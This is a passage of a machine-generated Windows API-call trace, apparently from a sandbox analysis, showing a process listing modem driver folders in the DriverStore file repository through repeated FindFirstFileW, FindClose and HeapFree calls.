lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr004.inf_amd64_neutral_ccf1bc353e588fe1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48cdc276, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dd834b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dd834b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.679] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr005.inf_amd64_neutral_d140721f97061bba\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48d9a957, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.680] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.680] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr006.inf_amd64_neutral_40c76453575b1208\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48e59038, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.681] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr007.inf_amd64_neutral_91d259640bad7d26\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48f3d87a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e2460c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e2460c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.681] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr008.inf_amd64_neutral_2cedaac353c381da\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48ffbf5b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e4a76c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e4a76c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.682] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr00a.inf_amd64_neutral_aa4f0850ff03674e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x490ba63d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e708cd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e708cd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.682] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbsb.inf_amd64_neutral_56a9f6bceeec7f72\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49e1e215, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x679e52c2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x679e52c2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.683] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.683] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39c712bb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6f97d0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6f97d0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.684] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.684] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbug3.inf_amd64_neutral_7617862a9cc286da\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49eb6796, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.686] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbw561.inf_amd64_neutral_fe42c0ff14d5562b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49f74e78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.695] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a00d3f9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.695] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcdp.inf_amd64_neutral_170c11f3a6d3f0a8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a0cbada, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.696] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.696] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcm28.inf_amd64_neutral_d3fa0f62d3d7cea1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a1d647c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a7d843, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a7d843, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.696] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcodex.inf_amd64_neutral_9bb71004e7b8f7ae\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a2bacbe, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ac9b03, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ac9b03, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.697] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcom1.inf_amd64_neutral_96c22c683482d8bd\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a39f500, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67aefc64, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67aefc64, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.698] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcommu.inf_amd64_neutral_83cc415156be45c8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a45dbe1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b3bf24, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b3bf24, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.698] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcomp.inf_amd64_neutral_e5ca2f01ca47bddb\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a4f6162, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b62084, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b62084, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.699] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.699] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq.inf_amd64_neutral_fbc4a14a6a13d0c8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3aa06f9e, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c3e9f0e, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c3e9f0e, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.700] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.700] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq2.inf_amd64_neutral_e9784021af1f5e24\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a5b4843, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b881e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b881e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.700] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.700] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpv.inf_amd64_neutral_5667cca434e3a6b7\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a64cdc4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bae345, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bae345, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.701] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.701] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcrtix.inf_amd64_neutral_e91a5dc0655e200a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6e5346, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bd44a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bd44a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.702] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxhv6.inf_amd64_neutral_81ba64c5b6150dd3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b0515e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c363a89, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c363a89, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.704] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxpv6.inf_amd64_neutral_f62ac4bd04e653d0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50c81f21, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c3d5eaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c3d5eaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.709] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm5.inf_amd64_neutral_0bb09f3e5a59f3a8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a7c9b87, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c20766, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c20766, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.711] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm6.inf_amd64_neutral_b1db427ce3d2a1b4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a8d4529, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c6ca26, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c6ca26, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.712] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdf56f.inf_amd64_neutral_26a79521b746fc31\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a992c0a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c92b87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c92b87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.713] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.713] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdgitn.inf_amd64_neutral_09132735f1063a47\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aa2b18c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cb8ce7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cb8ce7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.713] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.713] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdp2.inf_amd64_neutral_ab710894455d7b9a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aac370d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cdee47, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cdee47, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.714] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdsi.inf_amd64_neutral_e77f438012239042\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ac404cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67d2b108, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67d2b108, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.714] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdyna.inf_amd64_neutral_7e4d690d07ee94c1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4adbd292, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67de97e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67de97e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.715] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeiger.inf_amd64_neutral_492d4e047d14bde9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ae7b974, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67e5bc0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67e5bc0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, 